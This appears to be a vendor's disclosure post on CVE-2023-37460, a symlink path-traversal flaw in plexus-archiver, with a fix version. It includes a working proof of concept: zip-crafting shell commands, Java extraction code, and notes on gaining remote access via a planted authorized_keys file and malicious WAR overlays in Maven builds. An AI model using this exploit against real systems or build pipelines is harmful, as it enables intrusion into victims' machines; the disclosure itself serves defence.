Arbitrary File Creation vulnerability in plexus-archiver – CVE-2023-37460

The JFrog Security Research team constantly monitors open-source projects to find new vulnerabilities or malicious packages and shares them with the wider community to help improve their overall security posture. As part of this effort, the team recently discovered a new security vulnerability in plexus-archiver, an archive creation and extraction package. plexus-archiver is used by many packages; one of them is maven-war-plugin, which is invoked when running “mvn package” to create a WAR file.

The JFrog Security Research team responsibly disclosed the vulnerability and worked with plexus-archiver’s maintainers on verifying the fix.

Back in 2018, a ZipSlip vulnerability was discovered and fixed in plexus-archiver. A ZipSlip vulnerability occurs when an archive extractor allows entries with “../” in their names to be written to the filesystem, causing an arbitrary file write outside of the extraction directory. It turns out that even after the fix, plexus-archiver was still vulnerable to a similar attack, as we will see shortly.
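
For illustration, here is a minimal sketch of how a ZipSlip-style archive could be produced with the standard java.util.zip API (the entry name, file name and payload below are hypothetical, for demonstration only):

import java.io.FileOutputStream;
import java.nio.charset.StandardCharsets;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;

public class ZipSlipArchive
{
    public static void main( String[] args ) throws Exception
    {
        // The entry name climbs out of the extraction directory.
        // An extractor that joins dir + entryName without validation would
        // write the payload outside of dir, e.g. to <dir>/../../outside.txt.
        try ( ZipOutputStream zos = new ZipOutputStream( new FileOutputStream( "zipslip.zip" ) ) )
        {
            zos.putNextEntry( new ZipEntry( "../../outside.txt" ) );
            zos.write( "payload".getBytes( StandardCharsets.UTF_8 ) );
            zos.closeEntry();
        }
    }
}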

CVE ID: CVE-2023-37460
Description: Path traversal in AbstractUnArchiver when extracting a malicious archive
Potential Impact: Remote code execution (RCE)
CVSSv3.1 Score: 8.1

CVE-2023-37460 can be exploited by extracting a malicious archive that contains a symlink pointing to a path outside of the extraction directory. By triggering the vulnerability, an attacker can create an arbitrary file (one that did not already exist), which can lead to remote code execution.

Technical Details

In AbstractUnArchiver.java:

protected void extractFile( final File srcF, final File dir, final InputStream compressedInputStream,
                            String entryName, final Date entryDate, final boolean isDirectory,
                            final Integer mode, String symlinkDestination, final FileMapper[] fileMappers )
    throws IOException, ArchiverException
    {
        ...
        // Hmm. Symlinks re-evaluate back to the original file here. Unsure if this is a good thing...
        final File targetFileName = FileUtils.resolveFile( dir, entryName );
        ...
        Path canonicalDirPath = dir.getCanonicalFile().toPath();
        Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();


        if ( !canonicalDestPath.startsWith( canonicalDirPath ) )
        {
            throw new ArchiverException( "Entry is outside of the target directory (" + entryName + ")" );
        }


        try
        {
            ...
            if ( !StringUtils.isEmpty( symlinkDestination ) )
            {
                SymlinkUtils.createSymbolicLink( targetFileName, new File( symlinkDestination ) );
                ...
            }
            else
            {
                try ( OutputStream out = Files.newOutputStream( targetFileName.toPath() ) )
                {
                    IOUtil.copy( compressedInputStream, out );
                }
            }
            ...

When the extractor is given an entry that already exists in dir as a symbolic link whose target does not exist, the symbolic link's target will be created and the content of the archive's entry will be written to it.

This happens because of the way FileUtils.resolveFile() works: after some processing of the directory and the entry name, it calls file.getCanonicalFile() on the full file path.

Although File.getCanonicalFile() guarantees “resolving symbolic links”, it behaves a little differently than you might expect. File.getCanonicalFile() will eventually call JDK_Canonicalize():

JNIEXPORT int
JDK_Canonicalize(const char *orig, char *out, int len)
{
    ...
    /* First try realpath() on the entire path */
    if (realpath(orig, out)) {
        /* That worked, so return it */
        collapse(out);
        return 0;
    } else {
        /* Something's bogus in the original path, so remove names from the end
           until either some subpath works or we run out of names */
    ...

realpath() returns the destination path for a symlink if the destination exists. If it doesn't, realpath() returns NULL and we reach the else clause, which eventually returns the path of the symlink itself.

So if the entry already exists as a symbolic link to a non-existent file, file.getCanonicalFile() will return the absolute path of the symbolic link itself, and this check will pass:

Path canonicalDirPath = dir.getCanonicalFile().toPath();
Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();


if ( !canonicalDestPath.startsWith( canonicalDirPath ) )
{
    throw new ArchiverException( "Entry is outside of the target directory (" + entryName + ")" );
}

Later, the entry's content is written through the symbolic link, which creates the destination file and fills it with the entry's content.
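
To illustrate this behavior outside of plexus-archiver, the following minimal sketch (a standalone demo; the /tmp/target path mirrors the PoC below and is otherwise arbitrary) shows that getCanonicalFile() on a dangling symlink returns the path of the symlink itself, so the directory check passes:

import java.io.File;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

public class CanonicalizeDemo
{
    public static void main( String[] args ) throws Exception
    {
        Path dir = Files.createTempDirectory( "extract" );

        // "entry1" is a symlink whose target does not exist yet
        Path link = dir.resolve( "entry1" );
        Files.createSymbolicLink( link, Paths.get( "/tmp/target" ) );

        // Same check as in AbstractUnArchiver.extractFile()
        Path canonicalDirPath = dir.toFile().getCanonicalFile().toPath();
        Path canonicalDestPath = link.toFile().getCanonicalFile().toPath();

        // realpath() fails on the dangling target, so the fallback returns
        // the symlink's own path, which is inside dir, and the check passes
        System.out.println( canonicalDestPath );
        System.out.println( canonicalDestPath.startsWith( canonicalDirPath ) ); // true
    }
}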

Arbitrary file creation can lead to remote code execution. For example, if an SSH server is running on the victim's machine and ~/.ssh/authorized_keys does not exist, creating this file and filling it with an attacker's public key will allow the attacker to connect to the SSH server without knowing the victim's password.

PoC Exploit

We created a zip as follows:

$ ln -s /tmp/target entry1
$ echo -ne "content" > entry2
$ zip --symlinks archive.zip entry1 entry2

The following command changes the name of entry2 to entry1 inside the archive, so the archive now contains two entries with the same name:

$ sed -i 's/entry2/entry1/' archive.zip

We copy archive.zip to /tmp and create a directory for the extracted files:

$ cp archive.zip /tmp
$ mkdir /tmp/extracted_files

Next, we wrote a small Java program that extracts archive.zip:

package com.example;

import java.io.File;

import org.codehaus.plexus.archiver.zip.ZipUnArchiver;

public class App 
{
    public static void main( String[] args )
    {
        ZipUnArchiver unArchiver = new ZipUnArchiver(new File("/tmp/archive.zip"));
        unArchiver.setDestDirectory(new File("/tmp/extracted_files"));
        unArchiver.extract();        
    }
}

After running this Java code, we can see that /tmp/target was created and contains the string “content”:

$ cat /tmp/target
content

Notice that although we used a duplicated entry name within a single archive here, the attack can also be performed with two different archives: one that contains the symlink, and another that contains a regular file with the same entry name as the symlink, as sketched below.
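
As a rough sketch of that two-archive variant (the archive names here are hypothetical), the first extraction plants the symlink and the second one writes through it into the same destination directory:

import java.io.File;

import org.codehaus.plexus.archiver.zip.ZipUnArchiver;

public class TwoArchiveVariant
{
    public static void main( String[] args )
    {
        File destDir = new File( "/tmp/extracted_files" );

        // archive1.zip contains "entry1" as a symlink to /tmp/target
        ZipUnArchiver first = new ZipUnArchiver( new File( "/tmp/archive1.zip" ) );
        first.setDestDirectory( destDir );
        first.extract();

        // archive2.zip contains a regular file also named "entry1";
        // its content is written through the planted symlink, creating /tmp/target
        ZipUnArchiver second = new ZipUnArchiver( new File( "/tmp/archive2.zip" ) );
        second.setDestDirectory( destDir );
        second.extract();
    }
}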

Maven and plexus-archiver

plexus-archiver is used by maven-war-plugin when packaging a WAR file.

A WAR file is a compressed archive that contains a web application. The web application may contain Java classes, shared objects (or DLLs), and JSP pages.

One can configure maven-war-plugin to combine a couple of WARs into one WAR by adding an overlays element to the plugin configuration, for example:

<plugin>
  <groupId>org.apache.maven.plugins</groupId>
  <artifactId>maven-war-plugin</artifactId>
  <version>3.4.0</version>
  <configuration>
    <overlays>
      <overlay>
          <groupId>group-id</groupId>
          <artifactId>war-</artifactId>
          <type>war</type>
      </overlay>
    </overlays>
  </configuration>
</plugin>

Also, the packaging type in pom.xml should be “war”:

<packaging>war</packaging>

Then, the packaging can be done by:

$ mvn package

As it turns out, maven-war-plugin uses plexus-archiver when extracting the WARs that are mentioned in the overlays element:

protected void doUnpack(WarPackagingContext context, File file, File unpackDirectory)
        throws MojoExecutionException {
    String archiveExt = FileUtils.getExtension(file.getAbsolutePath()).toLowerCase();

    try {
        UnArchiver unArchiver = context.getArchiverManager().getUnArchiver(archiveExt);
        unArchiver.setSourceFile(file);
        unArchiver.setDestDirectory(unpackDirectory);
        unArchiver.setOverwrite(true);
        unArchiver.extract();
    } catch (ArchiverException e) {
        throw new MojoExecutionException(
                "Error unpacking file [" + file.getAbsolutePath() + "]" + " to ["
                        + unpackDirectory.getAbsolutePath() + "]",
                e);
    } catch (NoSuchArchiverException e) {
        context.getLog()
                .warn("Skip unpacking dependency file [" + file.getAbsolutePath() + " with unknown extension ["
                        + archiveExt + "]");
    }
}

That means that running “mvn package” might be dangerous when one of the overlaid WAR files is malicious.

This gives attackers a stealthier payload, one that doesn't rely on well-known hijack techniques such as “maven-site-plugin”, “groovy-maven-plugin” and others. Such a payload is extremely unlikely to be detected by automated security scanners, and is even quite unlikely to be detected in a manual audit.

Remediation Recommendations

To fix this issue, update plexus-archiver to version 4.8.0 or later.

Are JFrog products vulnerable?

JFrog products are not vulnerable to this issue, since they do not use plexus-archiver.

Acknowledgement

We would like to thank the plexus-archiver team for promptly and professionally handling this issue.

Learn More

In addition to exposing new security vulnerabilities and threats, JFrog provides developers and security teams easy access to the latest relevant information for their software with automated security scanning. JFrog customers using JFrog Curation are already protected against CVE-2023-37460 (as well as against other CVEs that are marked as critical).

Questions? Thoughts? Contact us at research@jfrog.com for any inquiries.